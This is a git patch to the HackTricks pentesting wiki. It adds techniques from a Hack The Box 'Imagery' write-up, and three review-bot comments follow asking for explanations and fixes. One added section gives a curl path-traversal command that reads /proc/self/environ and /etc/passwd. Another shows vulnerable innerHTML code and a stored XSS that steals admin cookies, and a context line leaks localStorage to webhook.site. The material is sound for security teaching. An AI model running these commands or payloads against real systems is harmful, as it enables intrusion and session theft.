From 2c5bd4563ccfbb135cab7106ee3a5042f025d067 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Sat, 24 Jan 2026 18:33:15 +0000 Subject: [PATCH] Add content from: HTB: Imagery --- src/pentesting-web/file-inclusion/README.md | 14 ++++++++++++- .../xss-cross-site-scripting/dom-xss.md | 20 +++++++++++++++++++ 2 files changed, 33 insertions(+), 1 deletion(-) diff --git a/src/pentesting-web/file-inclusion/README.md b/src/pentesting-web/file-inclusion/README.md index c6045bb956a..719bd0a628f 100644 --- a/src/pentesting-web/file-inclusion/README.md +++ b/src/pentesting-web/file-inclusion/README.md @@ -793,6 +793,18 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
+### Preserve traversal sequences from the client + +Some HTTP clients normalize or collapse `../` before the request reaches the server, breaking directory traversal payloads. Use `curl --path-as-is` to keep traversal untouched when abusing log/download endpoints that concatenate a user-controlled filename, and add `--ignore-content-length` for pseudo-files like `/proc`: + +```bash +curl --path-as-is -b "session=$SESSION" \ + "http://TARGET/admin/get_system_log?log_identifier=../../../../proc/self/environ" \ + --ignore-content-length -s | tr '\000' '\n' +``` + +Tune the number of `../` segments until you escape the intended directory, then dump `/etc/passwd`, `/proc/self/cwd/app.py`, or other source/config files. + ## References - [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal) @@ -803,9 +815,9 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._ - [Orange Tsai – Confusion Attacks on Apache](https://blog.orange.tw/posts/2024-08-confusion-attacks-en/) - [VTENEXT 25.02 – a three-way path to RCE](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/) - [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/) - - [When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise](https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth-vulnerabilities-in-trufusion-enterprise/) - [Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?](https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/) +- [HTB: Imagery (admin log download traversal + `/proc/self/environ` read)](https://0xdf.gitlab.io/2026/01/24/htb-imagery.html) {{#file}} EN-Local-File-Inclusion-1.pdf 
diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md index 1d19e2889c5..3aced30d005 100644 --- a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md +++ b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md @@ -354,9 +354,29 @@ fetch('https://webhook.site/?flag=' + encodeURIComponent(localStorage.getIte If the bot does not restrict schemes, supplying a `javascript:` URL (`javascript:fetch(...)`) executes in the current origin without new navigation, directly leaking storage values. +## Template literal `innerHTML` + partial sanitization gaps + +Frontends that sanitize only selected fields but still interpolate an untrusted one directly into `innerHTML` are trivially exploitable. Example: + +```javascript +fetch(`${window.location.origin}/admin/bug_reports`).then(r => r.json()).then(reports => { + reports.forEach(report => { + reportCard.innerHTML = ` +
${DOMPurify.sanitize(report.id)}
+
${report.details}
+ `; + }); +}); +``` + +If the un-sanitized field is stored server-side (e.g., bug report “details”), the payload becomes **stored DOM XSS** for any privileged viewer of the list. A simple payload such as `` executes when an admin opens the page and exfiltrates their cookies. + +When the app explicitly disables `SESSION_COOKIE_HTTPONLY` (e.g., Flask `app.config['SESSION_COOKIE_HTTPONLY'] = False`), the stolen cookie immediately grants the admin session even if the signing secret rotates on each boot (random `secret_key` prevents forging, but theft still works). + ## References - [Flagvent 2025 (Medium) — pink, Santa’s Wishlist, Christmas Metadata, Captured Noise](https://0xdf.gitlab.io/flagvent2025/medium) +- [HTB: Imagery (stored DOM XSS via partial DOMPurify + session theft)](https://0xdf.gitlab.io/2026/01/24/htb-imagery.html) {{#include ../../banners/hacktricks-training.md}}
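Review bot: the new "Preserve traversal sequences from the client" section tells the reader to add `--ignore-content-length` for pseudo-files like `/proc` but never says why; one sentence would do, e.g. "entries under `/proc` report a file size of 0, so a server that derives Content-Length from the file size makes curl stop reading the body". The same applies to the `tr '\000' '\n'` pipe, which only matters for NUL-separated files such as `/proc/self/environ`; say so, otherwise the reader will apply it to `/etc/passwd` output too. Also `$SESSION` in `-b "session=$SESSION"` is never introduced; mark it as a placeholder for the authenticated session cookie value.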
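Review bot: the References hunk removes the `- [When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise]` entry while adding the HTB: Imagery one, but the commit subject only mentions adding content, so confirm the removal is intended. If the goal was just to drop the stray leading space before that bullet, re-add the line without the space so the reference is kept.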
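Review bot: the new "Template literal `innerHTML` + partial sanitization gaps" section describes the flaw but never states the fix; add one line saying that every interpolated field must go through `DOMPurify.sanitize(...)` (here `report.details`, not only `report.id`), or better, that untrusted text should be set with `textContent` on a created element rather than concatenated into `innerHTML`. The `SESSION_COOKIE_HTTPONLY` paragraph should likewise spell out that keeping the Flask default (HttpOnly enabled) would have stopped the cookie theft even though the XSS itself remains. Also, "A simple payload such as `` executes" renders as empty backticks, so the angle-bracket tags in the example are probably being swallowed by the renderer; escape them so the markdown shows what was meant.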